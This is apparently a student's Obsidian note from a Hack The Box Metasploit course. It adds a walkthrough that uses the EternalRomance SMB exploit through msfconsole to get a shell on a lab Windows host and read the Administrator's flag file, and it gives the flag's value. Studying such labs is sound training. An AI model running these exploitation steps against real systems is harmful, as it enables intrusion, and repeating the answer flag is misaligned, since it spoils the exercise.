ljaime-hernandez/My-Obsidian-Vault/HTB/Using The Metasploit Framework/MSF Components/Modules.md

 ```

 This has been a quick and dirty example of how `msfconsole` can help out quickly but serves as an excellent example of how the framework works.
 Only one module was needed without any `payload` selection, `encoding` or `pivoting` between sessions or jobs.

+Use the Metasploit-Framework to exploit the target with EternalRomance.
+Find the flag.txt file on Administrator's desktop and submit the contents as the answer.

+`HTB{MSF-W1nD0w5-3xPL01t4t10n}`
+* retrieve ip from HTB
+* open msfconsole
+* type `search eternalromance`
+* type `use 0` to choose the exploit option
+* type `options`
+* set RHOSTS with HTB ip
+* set LHOST with attacker ip (tun0 ip used when using openvpn)
+* type `run` command
+* on powershell, type `cd ../..` to get to C: folder
+* type `cd Users/Administrator/Desktop`
+* type `cat flag.txt`